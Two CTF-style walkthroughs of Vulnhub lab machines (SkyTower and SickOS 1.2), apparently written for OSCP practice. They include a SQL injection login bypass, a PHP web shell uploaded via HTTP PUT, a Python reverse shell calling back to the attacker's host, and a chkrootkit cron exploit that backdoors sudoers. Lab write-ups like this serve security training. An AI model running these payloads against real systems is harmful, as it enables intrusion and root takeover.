vulnhub machine SKYTOWER walkthrough

Vulnhub Machine SkyTower Walkthrough OSCP friendly/ No Metasploit

Nmap:

# Nmap 7.70 scan initiated Thu Aug  8 02:55:03 2019 as: nmap -sC -sV -p- -oN nmap 192.168.8.183

Nmap scan report for SkyTower (192.168.8.183)

Host is up (0.0019s latency).

Not shown: 65532 closed ports

PORT     STATE    SERVICE    VERSION

22/tcp   filtered ssh

80/tcp   open     http       Apache httpd 2.2.22 ((Debian))

|_http-server-header: Apache/2.2.22 (Debian)

|_http-title: Site doesn't have a title (text/html).

3128/tcp open     http-proxy Squid http proxy 3.1.20

| http-open-proxy: Potentially OPEN proxy.

|_Methods supported: GET HEAD

|_http-server-header: squid/3.1.20

|_http-title: ERROR: The requested URL could not be retrieved

MAC Address: 08:00:27:54:4A:37 (Oracle VirtualBox virtual NIC)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

# Nmap done at Thu Aug  8 02:55:57 2019 -- 1 IP address (1 host up) scanned in 54.69 seconds

We have SSH filtered and a Squid HTTP proxy on port 3128, most probably the SSH is behind proxy, lets check it later. First  the WebServer.

We have login page, so lets try common creds and sqli.

On Trying sqli the server give us an error but also telling us some characters are filtered. Trying multiple characters , the string test’ || 1=1#  worked. So user test@test and password test’ || 1=1#  .

 

We got login credentials for user john, lets try to use it in ssh.

First of all we need to access ssh through proxy, there are two ways,

One is by using proxytunnel

proxytunnel -p 192.168.8.183:3128 -d 192.168.8.183:22 -a 1234

Second it by proxychains, by adding the below give in /etc/proxychains.conf

http 192.168.8.183 3128

and

proxychains ssh john@192.168.8.183

Our session got termed as soon as it was connected.

proxychains ssh john@192.168.8.183 /bin/bash

This give us a new bash shell upon connection, first thing to do

Rm .bashrc

So that condition of immediate termination is removed.

Goto /var/www and there are mysql database credentials as root:root.

We can find this out by downloading LinEnum.sh script via wget and execute it.

Login into mysql by 

Mysql -u root -proot

In Mysql

show databases;

use SkyTech;

show tables;

mysql> select * from login;

+----+---------------------+--------------+

| id | email               | password     |

+----+---------------------+--------------+

|  1 | john@skytech.com    | hereisjohn   |

|  2 | sara@skytech.com    | ihatethisjob |

|  3 | william@skytech.com | senseable    |

+----+---------------------+--------------+

3 rows in set (0.01 sec)

Lets login as sara.

proxychains ssh sara@192.168.8.183 /bin/bash

ProxyChains-3.1 (http://proxychains.sf.net)

|S-chain|-<>-192.168.8.183:3128-<><>-192.168.8.183:22-<><>-OK

sara@192.168.8.183's password:

id

uid=1001(sara) gid=1001(sara) groups=1001(sara)

We checked sara’s privileges by sudo -l

Matching Defaults entries for sara on this host:

    env_reset, mail_badpass,

    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User sara may run the following commands on this host:

    (root) NOPASSWD: /bin/cat /accounts/*, (root) /bin/ls /accounts/*

So we can use sudo only for /bin/cat and /accounts/*

sudo /bin/ls /accounts/../root

flag.txt

sudo /bin/cat /accounts/../root/flag.txt

Congratz, have a cold one to celebrate!

root password is theskytower

We have root credentials as root:theskytower.

 



574r570rm

SICK OS v1.2 Walkthrough

Vulnhub machine SICK OS 1.2 Walkthrough (OSCP friendly and no Metasploit)

We start with nmap and found only 2 ports open SSH and HTTP.

# Nmap 7.70 scan initiated Sat Aug  3 20:02:23 2019 as: nmap -sC -sV -p- -oN nmap 192.168.78.144

Nmap scan report for 192.168.78.144

Host is up (0.0015s latency).

Not shown: 65533 filtered ports

PORT   STATE SERVICE VERSION

22/tcp open  ssh     OpenSSH 5.9p1 Debian 5ubuntu1.8 (Ubuntu Linux; protocol 2.0)

| ssh-hostkey:

|   1024 66:8c:c0:f2:85:7c:6c:c0:f6:ab:7d:48:04:81:c2:d4 (DSA)

|   2048 ba:86:f5:ee:cc:83:df:a6:3f:fd:c1:34:bb:7e:62:ab (RSA)

|_  256 a1:6c:fa:18:da:57:1d:33:2c:52:e4:ec:97:e2:9e:af (ECDSA)

80/tcp open  http    lighttpd 1.4.28

|_http-server-header: lighttpd/1.4.28

|_http-title: Site doesn't have a title (text/html).

MAC Address: 00:0C:29:CD:1F:EC (VMware)

Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

# Nmap done at Sat Aug  3 20:04:24 2019 -- 1 IP address (1 host up) scanned in 120.72 seconds

Do Enumeration of both services;

SSH is OpenSSH 5.9p1 , look for an exploit for it, there is no exploit found for this specific version.

Check HTTP service, with nikto , dirb and every tool you can think of until you find some lead.

-----------------

DIRB v2.22    

By The Dark Raver

-----------------

OUTPUT_FILE: dirb

START_TIME: Tue Aug  6 14:04:42 2019

URL_BASE: http://192.168.78.144/

WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.78.144/ ----

+ http://192.168.78.144/index.php (CODE:200|SIZE:163)

==> DIRECTORY: http://192.168.78.144/test/

---- Entering directory: http://192.168.78.144/test/ ----

(!) WARNING: Directory IS LISTABLE. No need to scan it.

    (Use mode '-w' if you want to scan it anyway)

-----------------

END_TIME: Tue Aug  6 14:04:51 2019

DOWNLOADED: 4612 - FOUND: 1

Dirb give us /test

From here we are kind of lost, lets find out more about WebServer.

Checking http methods with nse script.

nmap --script http-methods 192.168.78.144

Starting Nmap 7.70 ( https://nmap.org ) at 2019-08-07 06:29 EDT

Nmap scan report for 192.168.78.144

Host is up (0.0013s latency).

Not shown: 998 filtered ports

PORT   STATE SERVICE

22/tcp open  ssh

80/tcp open  http

| http-methods:

|_  Supported Methods: GET HEAD POST OPTIONS

MAC Address: 00:0C:29:CD:1F:EC (VMware)

Nmap done: 1 IP address (1 host up) scanned in 18.51 seconds

Further checking the OPTIONS Method.

root@kali:~/vulnhub/sickos2# curl -X OPTIONS -v 192.168.78.144/test

*   Trying 192.168.78.144...

* TCP_NODELAY set

* Connected to 192.168.78.144 (192.168.78.144) port 80 (#0)

> OPTIONS /test HTTP/1.1

> Host: 192.168.78.144

> User-Agent: curl/7.60.0

> Accept: */*

>

< HTTP/1.1 301 Moved Permanently

< DAV: 1,2

< MS-Author-Via: DAV

< Allow: PROPFIND, DELETE, MKCOL, PUT, MOVE, COPY, PROPPATCH, LOCK, UNLOCK

< Location: http://192.168.78.144/test/

< Content-Length: 0

< Date: Wed, 07 Aug 2019 10:30:53 GMT

< Server: lighttpd/1.4.28

<

* Connection #0 to host 192.168.78.144 left intact

We have PUT method possible , lets try it.

Curl -v -X PUT -d ‘<?php echo system($_GET[“cmd”]); ?>’ http://192.168.78.144/test/star.php

We will use post command to upload or create a file if the PUT method didn’t work.

Upon checking the /test URL we found our new page star.php. Lets get a shell.

Using multiple methods of reverse shell one by one. I found the python reverse shell working on port 8080. It failed on some ports seems only a few are allowed, I checked the ports by making a webserver on my machine and trying to access it by wget from the target, just to know if that port is open for communication.

http://192.168.78.144/test/star.php?cmd=python%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22192.168.78.135%22,8080));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/sh%22,%22-i%22]);%27

We Got a shell of user ‘www-data’ with this command.

Looking for privilege escalation, tried multiple kernel exploits for 3.11 kernel but none worked.

Upon using a privilege escalation checker scripts, i found a cron job running chkrootkit as root. There is an local priv esc exploit for chkrootkit for version 0.49. We can check the version by typing command :

Chkrootkit -V

The version of chkrootkit is 0.49 in target. One more condition of this exploit is that the /tmp should be noexec and the priv esc script told us this already. So , the system is meeting all conditions, lets use the exploit.

exploits/linux/local/33899.txt

As per the exploit we need to create a file named ‘update’ in /tmp. Put our malicious code in it , make it executable and wait for the cron job to execute it.

The code I write in update file is :

echo 'chmod 777 /etc/sudoers && echo "www-data ALL=NOPASSWD: ALL" >> /etc/sudoers && chmod 440 /etc/sudoers' > /tmp/update

What this do is, since this will be run as root, so change the permission of sudoers file , then make the www-data user able to run all sudo commands, and then change the sudoers file back to the permissions it had.

www-data@ubuntu:/etc$ sudo -l

Matching Defaults entries for www-data on this host:

    env_reset,

    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-data may run the following commands on this host:

    (root) NOPASSWD: ALL

    (root) NOPASSWD: ALL

    (root) NOPASSWD: ALL

    (root) NOPASSWD: ALL

    (root) NOPASSWD: ALL

    (root) NOPASSWD: ALL

    (root) NOPASSWD: ALL

    (root) NOPASSWD: ALL

    (root) NOPASSWD: ALL

    (root) NOPASSWD: ALL

    (root) NOPASSWD: ALL

    (root) NOPASSWD: ALL

    (root) NOPASSWD: ALL

    (root) NOPASSWD: ALL

    (root) NOPASSWD: ALL

    (root) NOPASSWD: ALL

    (root) NOPASSWD: ALL

    (root) NOPASSWD: ALL

    (root) NOPASSWD: ALL

    (root) NOPASSWD: ALL

    (root) NOPASSWD: ALL

    (root) NOPASSWD: ALL

    (root) NOPASSWD: ALL

    (root) NOPASSWD: ALL

    (root) NOPASSWD: ALL

    (root) NOPASSWD: ALL

    (root) NOPASSWD: ALL

    (root) NOPASSWD: ALL

    (root) NOPASSWD: ALL

    (root) NOPASSWD: ALL

    (root) NOPASSWD: ALL

www-data@ubuntu:/etc$ sudo su

root@ubuntu:/etc# id

uid=0(root) gid=0(root) groups=0(root)

root@ubuntu:/etc# whoami;hostname

root

ubuntu

After a while I checked the sudo permissions and our code was executed and we had all the sudo permissions.

root@ubuntu:/etc# cd /root

root@ubuntu:~# ls

304d840d52840689e0ab0af56d6d3a18-chkrootkit-0.49.tar.gz  chkrootkit-0.49

7d03aaa2bf93d80040f3f22ec6ad9d5a.txt                     newRule

root@ubuntu:~# cat 7d03aaa2bf93d80040f3f22ec6ad9d5a.txt

WoW! If you are viewing this, You have "Sucessfully!!" completed SickOs1.2, the challenge is more focused on elimination of tool in real scenarios where tools can be blocked during an assesment and thereby fooling tester(s), gathering more information about the target using different methods, though while developing many of the tools were limited/completely blocked, to get a feel of Old School and testing it manually.

Thanks for giving this try.

@vulnhub: Thanks for hosting this UP!.

The newRule file has the details of ports that are blocked by iptables.

root@ubuntu:~# cat newRule

# Generated by iptables-save v1.4.12 on Mon Apr 25 22:48:24 2016

*filter

:INPUT DROP [0:0]

:FORWARD ACCEPT [0:0]

:OUTPUT DROP [0:0]

-A INPUT -p tcp -m tcp --dport 22 -j ACCEPT

-A INPUT -p tcp -m tcp --dport 80 -j ACCEPT

-A INPUT -p tcp -m tcp --sport 8080 -j ACCEPT

-A INPUT -p tcp -m tcp --sport 443 -j ACCEPT

-A OUTPUT -p tcp -m tcp --sport 22 -j ACCEPT

-A OUTPUT -p tcp -m tcp --sport 80 -j ACCEPT

-A OUTPUT -p tcp -m tcp --dport 8080 -j ACCEPT

-A OUTPUT -p tcp -m tcp --dport 443 -j ACCEPT

COMMIT

# Completed on Mon Apr 25 22:48:24 2016

 


 574r570rm